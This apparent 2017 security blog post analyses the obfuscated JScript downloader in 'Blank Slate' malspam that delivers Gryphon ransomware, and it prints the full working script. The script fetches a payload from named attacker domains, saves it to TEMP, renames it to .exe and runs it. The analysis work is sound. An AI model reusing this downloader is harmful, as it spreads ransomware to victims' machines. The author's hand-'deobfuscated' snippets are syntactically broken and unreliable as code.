2017-08-04 Quick Post – Deobfuscating the Javascript from “Blank Slate” malspam Pushing Gryphon Ransomware (A BTCware variant)

Just a quick one for today. I saw Brad’s tweet about a sample of Blank Slate malspam and decided to see if I could find some today while at work. Thankfully the email filters did their job and all of them were blocked. Brad also blogged about this over on his blog which you can read about here. Instead of breaking down the traffic and such (since he already did an excellent job at that and since the callbacks are exactly the same as his), I figured that I would try my hand at deobfuscating the Javascript. Some of it I got and understand, while other parts of the script I am not sure about since there are parameters that are being passed around that I do not see being declared.

Below is the original Javascript code. My goal was to try and figure out 1) what where the URLs involved in this, 2) where did it save the file to, and 3) what was the name of the file.

 
var OYVVwnOtP = new Function('grXPRbLhz, FXv', 'FXv.Open(); FXv.Type = 1;  FXv.Write(grXPRbLhz); FXv.Position = 0;');

function JBDmDZBuEB(grXPRbLhz, LrbxZvcrBPR){
	eval('var FXv = new ActiveXObject("ADODB.Stream");');
  OYVVwnOtP(grXPRbLhz, FXv); 
   FXv.SaveToFile(LrbxZvcrBPR, 2);
   FXv.Close();
   return true;
}

function ZHBCBwZoAeg(iHrrDmvJ){
	return iHrrDmvJ(null, true);
}

function YbfHyzPEx(grXPRbLhz, NeWBrXq){
 try{
  var LrbxZvcrBPR = kkjtVXmjFGm();
  if (LrbxZvcrBPR){
var PtboGJ = JBDmDZBuEB(grXPRbLhz, LrbxZvcrBPR); 
   if(!PtboGJ){
	  WScript.Echo('JBtVVL'); 
   }
   return NeWBrXq(LrbxZvcrBPR, false);
  }else {
   return NeWBrXq(null, true);
  }
 }catch (error){
  ZHBCBwZoAeg(function(iHrrDmvJ){
    return NeWBrXq(iHrrDmvJ);
});
 }
}

function BfXn(uhbWZftIiwx){
try{
 var cLdawRT = 'h!.f#it%%t!.f#it%%t!.f#it%%p!.f#it%%:!.f#it%%/!.f#it%%/!.f#it%%s!.f#it%%c!.f#it%%e!.f#it%%n!.f#it%%e!.f#it%%t!.f#it%%a!.f#it%%v!.f#it%%e!.f#it%%r!.f#it%%n!.f#it%%.!.f#it%%w!.f#it%%i!.f#it%%n!.f#it%%/!.f#it%%s!.f#it%%u!.f#it%%p!.f#it%%p!.f#it%%o!.f#it%%r!.f#it%%t!.f#it%%.!.f#it%%p!.f#it%%h!.f#it%%p!.f#it%%?!.f#it%%f!.f#it%%=!.f#it%%1!.f#it%%.!.f#it%%d!.f#it%%a!.f#it%%t'.split('!.f#it%%').join('');
   zyNFNhDt(cLdawRT, function(rRqDEZL, XNrxa) {
	if (!XNrxa){
    return uhbWZftIiwx(rRqDEZL, false);
 }else{
var An = 'ho,lmiyXBToUPto,lmiyXBToUPto,lmiyXBToUPpo,lmiyXBToUP:o,lmiyXBToUP/o,lmiyXBToUP/o,lmiyXBToUPho,lmiyXBToUPao,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPvo,lmiyXBToUPio,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPao,lmiyXBToUP.o,lmiyXBToUPwo,lmiyXBToUPio,lmiyXBToUPno,lmiyXBToUP/o,lmiyXBToUPso,lmiyXBToUPuo,lmiyXBToUPpo,lmiyXBToUPpo,lmiyXBToUPoo,lmiyXBToUPro,lmiyXBToUPto,lmiyXBToUP.o,lmiyXBToUPpo,lmiyXBToUPho,lmiyXBToUPpo,lmiyXBToUP?o,lmiyXBToUPfo,lmiyXBToUP=o,lmiyXBToUP1o,lmiyXBToUP.o,lmiyXBToUPdo,lmiyXBToUPao,lmiyXBToUPt'.split('o,lmiyXBToUP').join('');
          zyNFNhDt(An, function(rRqDEZL, XNrxa) {
	          if (!XNrxa){
                 return uhbWZftIiwx(rRqDEZL, false);
	          }else{
 var LeBwYRrA = 'hudraUtudraUtudraUpudraU:udraU/udraU/udraUhudraUaudraUludraUludraUvudraUiudraUludraUludraUaudraU.udraUwudraUiudraUnudraU/udraUsudraUuudraUpudraUpudraUoudraUrudraUtudraU.udraUpudraUhudraUpudraU?udraUfudraU=udraU1udraU.udraUdudraUaudraUt'.split('udraU').join('');
	               zyNFNhDt(LeBwYRrA, function(rRqDEZL, XNrxa) {
	                 if (!XNrxa){
                        return uhbWZftIiwx(rRqDEZL, false);
	                 }else{
var fDCLYoAfB = 'h.%VhouJXxexz.Qt.%VhouJXxexz.Qt.%VhouJXxexz.Qp.%VhouJXxexz.Q:.%VhouJXxexz.Q/.%VhouJXxexz.Q/.%VhouJXxexz.Qh.%VhouJXxexz.Qa.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qv.%VhouJXxexz.Qi.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qa.%VhouJXxexz.Q..%VhouJXxexz.Qw.%VhouJXxexz.Qi.%VhouJXxexz.Qn.%VhouJXxexz.Q/.%VhouJXxexz.Qs.%VhouJXxexz.Qu.%VhouJXxexz.Qp.%VhouJXxexz.Qp.%VhouJXxexz.Qo.%VhouJXxexz.Qr.%VhouJXxexz.Qt.%VhouJXxexz.Q..%VhouJXxexz.Qp.%VhouJXxexz.Qh.%VhouJXxexz.Qp.%VhouJXxexz.Q?.%VhouJXxexz.Qf.%VhouJXxexz.Q=.%VhouJXxexz.Q1.%VhouJXxexz.Q..%VhouJXxexz.Qd.%VhouJXxexz.Qa.%VhouJXxexz.Qt'.split('.%VhouJXxexz.Q').join('');
	                       zyNFNhDt(fDCLYoAfB, function(rRqDEZL, XNrxa) {
	                          if (!XNrxa){
                                 return uhbWZftIiwx(rRqDEZL, false);
	                          }else{
	 var ZdDFB = 'h*UTE%pyNccJCzNt*UTE%pyNccJCzNt*UTE%pyNccJCzNp*UTE%pyNccJCzN:*UTE%pyNccJCzN/*UTE%pyNccJCzN/*UTE%pyNccJCzNh*UTE%pyNccJCzNa*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNv*UTE%pyNccJCzNi*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNa*UTE%pyNccJCzN.*UTE%pyNccJCzNw*UTE%pyNccJCzNi*UTE%pyNccJCzNn*UTE%pyNccJCzN/*UTE%pyNccJCzNs*UTE%pyNccJCzNu*UTE%pyNccJCzNp*UTE%pyNccJCzNp*UTE%pyNccJCzNo*UTE%pyNccJCzNr*UTE%pyNccJCzNt*UTE%pyNccJCzN.*UTE%pyNccJCzNp*UTE%pyNccJCzNh*UTE%pyNccJCzNp*UTE%pyNccJCzN?*UTE%pyNccJCzNf*UTE%pyNccJCzN=*UTE%pyNccJCzN1*UTE%pyNccJCzN.*UTE%pyNccJCzNd*UTE%pyNccJCzNa*UTE%pyNccJCzNt'.split('*UTE%pyNccJCzN').join('');
	                                 zyNFNhDt(ZdDFB, function(rRqDEZL, XNrxa) {
	                                 if (!XNrxa){
                                        return uhbWZftIiwx(rRqDEZL, false);
	                                 }else{
	                                      return uhbWZftIiwx(null, true);
	                                 }
		                         });
	                          }
		                  });
	                 }
		         });
	           }
	         });
	}
  });
}catch (error){
	 WScript.Echo(error);
  return callback(null, true);
 }
}

var UuWLYb = new Function('jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ', "jqOgH.open(wXctwooFWY+bjxBDp+LPVLBzsXfZ, gKcsgoe, false); jqOgH.send();");

function zyNFNhDt(gKcsgoe, oNec){
 try{
var wXctwooFWY = 'G', bjxBDp = 'E', LPVLBzsXfZ='T';
  var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
  UuWLYb(jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ);
  if (jqOgH.status == 200) {
   return oNec(jqOgH.ResponseBody, false);
  }else{
   return oNec(null, true);}
 }catch (error){
   return oNec(null, true);
 }
}
function XfVTJpem(sbzyF){
	var NGYTpk = Math.random().toString(sbzyF);
	return NGYTpk;
}
function kkjtVXmjFGm(){
  try{
	var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
   var hrqrpe = "\\";
   var sbzyF = 60 - 30 + 6, NCN = 200 - 200 + 2, dGo =  300 - 300 + 9, FxXqfgl = ".jpeg";
   eval('var NGYTpk = XfVTJpem(sbzyF);');
   var WgAnQ  = NGYTpk.substr(NCN, dGo) + FxXqfgl;
   var QlKC = hrqrpe + WgAnQ;
   eval('var gdSzth = vmKSEe.GetSpecialFolder(2) + QlKC;')
   return gdSzth;
  }catch (error){
   return false;
  }
}

function wP(weYEnghOO, pjueW){
	  try{
   var gxbzl, FkZHVBSIleW = '.eLgwbscAmuvxe';
   gxbzl = new ActiveXObject('Scripting.FileSystemObject');
   gxbzl.CopyFile(weYEnghOO, weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
   return pjueW(weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
	  }catch(e){
		  return null;
	  }
}
BfXn(function (DA, error) {
  if (!error){
   YbfHyzPEx(DA, function (fbJE, error) {
    if (!error){
     try{
		sXlXzdxRV(fbJE);
     }catch (error) {}
    }
   });
  }
});

function IvnSs(aLXV, bkHS){
 eval('var WJ = '+ aLXV+';  WJ.Run(bkHS);');
}

;function xvH(aLXV, bkHS){
 IvnSs(aLXV, bkHS);
}
 
function sHmTwEdTKus(EhUQRAnFKJ){
 var fRsxWxzjms = "WScript.Shell";
 var WJ = new ActiveXObject(fRsxWxzjms);  WJ.Run(EhUQRAnFKJ);
}

function EGggPCw(aLXV, bkHS){
xvH(aLXV, bkHS)
}

function VfjXQnOJOn(CdBxL){
return CdBxL[Math.floor((Math.random()*CdBxL.length))];
}

function nWzBNEcR(EhUQRAnFKJ){
			sHmTwEdTKus(EhUQRAnFKJ);
}
	  function  VJfO(BmWRBjy, aLXV){
		  var LPVLBzsXfZ = 0;
	  for (var i = 0; i < 10; i++) {
		  var GtbwmcRSqEG =  aLXV;
		  if(~GtbwmcRSqEG.indexOf('cript')){
		      LPVLBzsXfZ = 1;
            var ndsU = 1;
            while (ndsU < 2) {
			  wP(BmWRBjy, function (sedWqVUi){
	              EGggPCw(aLXV, sedWqVUi);
			  });
            ndsU++;
            }
		      break;
		  }
	    }
		return LPVLBzsXfZ;
	  }

function sXlXzdxRV(path){
	  var PE = null, OB = null;
	  
	  var  aLXV = VfjXQnOJOn(['return ds','sdfd', 'new ActiveXObject("WScript.Shell")']);
	   var  npAEAofTSq = 0;
	   function  rIiZQV(){
		    VJfO(path, aLXV);
		    npAEAofTSq++;
		   if( npAEAofTSq >1000054){
			   wP(path, function (nVA){
	                         nWzBNEcR(nVA)
			   });
			   return true;
		   }
		   return false;
	   }
	   var knWVRRPCS =  VJfO(path, aLXV);
	   
	   var i = 0;	   
	   do {
           i = knWVRRPCS;
           var wgR =  rIiZQV();	
		   if(wgR){
			   break;	
		   }
       } while (i < 1);
}

Basically I started off just trying to see any kind of patterns or anything that stood out. Looking through the code the first things that stood out where the following lines:

var cLdawRT = 'h!.f#it%%t!.f#it%%t!.f#it%%p!.f#it%%:!.f#it%%/!.f#it%%/!.f#it%%s!.f#it%%c!.f#it%%e!.f#it%%n!.f#it%%e!.f#it%%t!.f#it%%a!.f#it%%v!.f#it%%e!.f#it%%r!.f#it%%n!.f#it%%.!.f#it%%w!.f#it%%i!.f#it%%n!.f#it%%/!.f#it%%s!.f#it%%u!.f#it%%p!.f#it%%p!.f#it%%o!.f#it%%r!.f#it%%t!.f#it%%.!.f#it%%p!.f#it%%h!.f#it%%p!.f#it%%?!.f#it%%f!.f#it%%=!.f#it%%1!.f#it%%.!.f#it%%d!.f#it%%a!.f#it%%t'.split('!.f#it%%').join('');

var An = 'ho,lmiyXBToUPto,lmiyXBToUPto,lmiyXBToUPpo,lmiyXBToUP:o,lmiyXBToUP/o,lmiyXBToUP/o,lmiyXBToUPho,lmiyXBToUPao,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPvo,lmiyXBToUPio,lmiyXBToUPlo,lmiyXBToUPlo,lmiyXBToUPao,lmiyXBToUP.o,lmiyXBToUPwo,lmiyXBToUPio,lmiyXBToUPno,lmiyXBToUP/o,lmiyXBToUPso,lmiyXBToUPuo,lmiyXBToUPpo,lmiyXBToUPpo,lmiyXBToUPoo,lmiyXBToUPro,lmiyXBToUPto,lmiyXBToUP.o,lmiyXBToUPpo,lmiyXBToUPho,lmiyXBToUPpo,lmiyXBToUP?o,lmiyXBToUPfo,lmiyXBToUP=o,lmiyXBToUP1o,lmiyXBToUP.o,lmiyXBToUPdo,lmiyXBToUPao,lmiyXBToUPt'.split('o,lmiyXBToUP').join('');

var LeBwYRrA = 'hudraUtudraUtudraUpudraU:udraU/udraU/udraUhudraUaudraUludraUludraUvudraUiudraUludraUludraUaudraU.udraUwudraUiudraUnudraU/udraUsudraUuudraUpudraUpudraUoudraUrudraUtudraU.udraUpudraUhudraUpudraU?udraUfudraU=udraU1udraU.udraUdudraUaudraUt'.split('udraU').join('');

var fDCLYoAfB = 'h.%VhouJXxexz.Qt.%VhouJXxexz.Qt.%VhouJXxexz.Qp.%VhouJXxexz.Q:.%VhouJXxexz.Q/.%VhouJXxexz.Q/.%VhouJXxexz.Qh.%VhouJXxexz.Qa.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qv.%VhouJXxexz.Qi.%VhouJXxexz.Ql.%VhouJXxexz.Ql.%VhouJXxexz.Qa.%VhouJXxexz.Q..%VhouJXxexz.Qw.%VhouJXxexz.Qi.%VhouJXxexz.Qn.%VhouJXxexz.Q/.%VhouJXxexz.Qs.%VhouJXxexz.Qu.%VhouJXxexz.Qp.%VhouJXxexz.Qp.%VhouJXxexz.Qo.%VhouJXxexz.Qr.%VhouJXxexz.Qt.%VhouJXxexz.Q..%VhouJXxexz.Qp.%VhouJXxexz.Qh.%VhouJXxexz.Qp.%VhouJXxexz.Q?.%VhouJXxexz.Qf.%VhouJXxexz.Q=.%VhouJXxexz.Q1.%VhouJXxexz.Q..%VhouJXxexz.Qd.%VhouJXxexz.Qa.%VhouJXxexz.Qt'.split('.%VhouJXxexz.Q').join('');

var ZdDFB = 'h*UTE%pyNccJCzNt*UTE%pyNccJCzNt*UTE%pyNccJCzNp*UTE%pyNccJCzN:*UTE%pyNccJCzN/*UTE%pyNccJCzN/*UTE%pyNccJCzNh*UTE%pyNccJCzNa*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNv*UTE%pyNccJCzNi*UTE%pyNccJCzNl*UTE%pyNccJCzNl*UTE%pyNccJCzNa*UTE%pyNccJCzN.*UTE%pyNccJCzNw*UTE%pyNccJCzNi*UTE%pyNccJCzNn*UTE%pyNccJCzN/*UTE%pyNccJCzNs*UTE%pyNccJCzNu*UTE%pyNccJCzNp*UTE%pyNccJCzNp*UTE%pyNccJCzNo*UTE%pyNccJCzNr*UTE%pyNccJCzNt*UTE%pyNccJCzN.*UTE%pyNccJCzNp*UTE%pyNccJCzNh*UTE%pyNccJCzNp*UTE%pyNccJCzN?*UTE%pyNccJCzNf*UTE%pyNccJCzN=*UTE%pyNccJCzN1*UTE%pyNccJCzN.*UTE%pyNccJCzNd*UTE%pyNccJCzNa*UTE%pyNccJCzNt'.split('*UTE%pyNccJCzN').join('');

So this is pretty simple. There is a repeated pattern in the above lines of code that get “cut” out via the JOIN command at the end of the line. Once you remove those characters, you are left with the following lines:

var cLdawRT = 'http://scenetavern.win/support.php?f=1.dat'.split('!.f#it%%').join('');
var An = 'http://hallvilla.win/supprt.php?f=1.dat'.split('o,lmiyXBToUP').join('');
var LeBwYRrA = 'http://hallvilla.win/support.php?f=1.dat'.split('udraU').join('');
var fDCLYoAfB = 'http://hallvilla.win/support.php?f=1.dat'.split('.%VhouJXxexz.Q').join('');
var ZdDFB = 'http://hallvilla.win/support.php?f=1.dat'.split('*UTE%pyNccJCzN').join('');

Next, I saw the part of the code that is responsible for the GET request. This stood out because of the way the “GET” characters were assigned to the different variables.

Obfuscated
----------
var UuWLYb = new Function('jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ', "jqOgH.open(wXctwooFWY+bjxBDp+LPVLBzsXfZ, gKcsgoe, false); jqOgH.send();");

function zyNFNhDt(gKcsgoe, oNec){
 try{
var wXctwooFWY = 'G', bjxBDp = 'E', LPVLBzsXfZ='T';
  var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
  UuWLYb(jqOgH, gKcsgoe, wXctwooFWY, bjxBDp, LPVLBzsXfZ);
  if (jqOgH.status == 200) {
   return oNec(jqOgH.ResponseBody, false);
  }else{
   return oNec(null, true);}
 }catch (error){
   return oNec(null, true);
 }
}

Deobfuscated
------------
var UuWLYb = new Function('new ActiveXObject("MSXML2.XMLHTTP"), gKcsgoe, G, E, T', "new ActiveXObject("MSXML2.XMLHTTP").open(G+E+T, gKcsgoe, false); new ActiveXObject("MSXML2.XMLHTTP").send();");

function zyNFNhDt(gKcsgoe, oNec){
 try{
var wXctwooFWY = 'G', bjxBDp = 'E', LPVLBzsXfZ='T';
  var jqOgH = new ActiveXObject("MSXML2.XMLHTTP");
  UuWLYb(new ActiveXObject("MSXML2.XMLHTTP");, gKcsgoe, G, E, T);
  if (new ActiveXObject("MSXML2.XMLHTTP");.status == 200) {
   return oNec(new ActiveXObject("MSXML2.XMLHTTP");.ResponseBody, false);
  }else{
   return oNec(null, true);}
 }catch (error){
   return oNec(null, true);
 }
}

From here the next three functions deals with the naming of the file (looks to be random) and where it is downloaded to (SpecialFolder 2 is the TEMP folder on the system). The interesting part here is the code, from what I can tell, is using a base 36 numbering system as seen in the piece of code “var NGYTpk = Math.random().toString(36).” Also, whatever the name of the file is, there is a substr() method that starts at the third character of the file name, and goes 9 characters. This is seen via the piece of code “.substr(2, 9).” The file then, from what I can tell, gets copied while also dropping the “.jpeg” file extension (since the replace statement is using a null value) and also proceeds to replace the value found in the variable “FkZHVBSIleW” (‘.eLgwbscAmuvxe’) using “LgwbscAmuv” which leaves just “.exe.”

Obfuscated
----------
function XfVTJpem(sbzyF){
	var NGYTpk = Math.random().toString(sbzyF);
	return NGYTpk;
}
function kkjtVXmjFGm(){
  try{
	var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
   var hrqrpe = "\\";
   var sbzyF = 60 - 30 + 6, NCN = 200 - 200 + 2, dGo =  300 - 300 + 9, FxXqfgl = ".jpeg";
   eval('var NGYTpk = XfVTJpem(sbzyF);');
   var WgAnQ  = NGYTpk.substr(NCN, dGo) + FxXqfgl;
   var QlKC = hrqrpe + WgAnQ;
   eval('var gdSzth = vmKSEe.GetSpecialFolder(2) + QlKC;')
   return gdSzth;
  }catch (error){
   return false;
  }
}

function wP(weYEnghOO, pjueW){
	  try{
   var gxbzl, FkZHVBSIleW = '.eLgwbscAmuvxe';
   gxbzl = new ActiveXObject('Scripting.FileSystemObject');
   gxbzl.CopyFile(weYEnghOO, weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
   return pjueW(weYEnghOO.replace('.jpeg','') + FkZHVBSIleW.replace('LgwbscAmuv',''));
	  }catch(e){
		  return null;
	  }
}

Deobfuscated
------------
function XfVTJpem(36){
	var NGYTpk = Math.random().toString(36);
	return NGYTpk;

function kkjtVXmjFGm(){
  try{
	var vmKSEe = new ActiveXObject('Scripting.FileSystemObject');
   var hrqrpe = "\\";
   var sbzyF = 36, NCN = 2, dGo =  9, FxXqfgl = ".jpeg";
   eval('var NGYTpk = XfVTJpem(36);');
   var WgAnQ  = XfVTJpem(36);.substr(2, 9) + .jpeg;
   var QlKC = \\ + XfVTJpem(36);.substr(2, 9) + .jpeg;
   eval('var gdSzth = new ActiveXObject('Scripting.FileSystemObject');.GetSpecialFolder(2) + \\ + XfVTJpem(36);.substr(2, 9) + .jpeg;')
   return gdSzth;
  }catch (error){
   return false;
  }

function wP(weYEnghOO, pjueW){
	  try{
   var gxbzl, FkZHVBSIleW = '.eLgwbscAmuvxe';
   gxbzl = new ActiveXObject('Scripting.FileSystemObject');
   new ActiveXObject('Scripting.FileSystemObject');.CopyFile(weYEnghOO, weYEnghOO.replace('.jpeg','') + '.eLgwbscAmuvxe'.replace('LgwbscAmuv',''));
   return pjueW(weYEnghOO.replace('.jpeg','') + '.eLgwbscAmuvxe'.replace('LgwbscAmuv',''));
	  }catch(e){
		  return null;
	  }
}

From there there are references to “WScript.Shell” and also a “Run” command as well which is most likely how the malware starts once the file has been downloaded.

Leave a Reply

Your email address will not be published.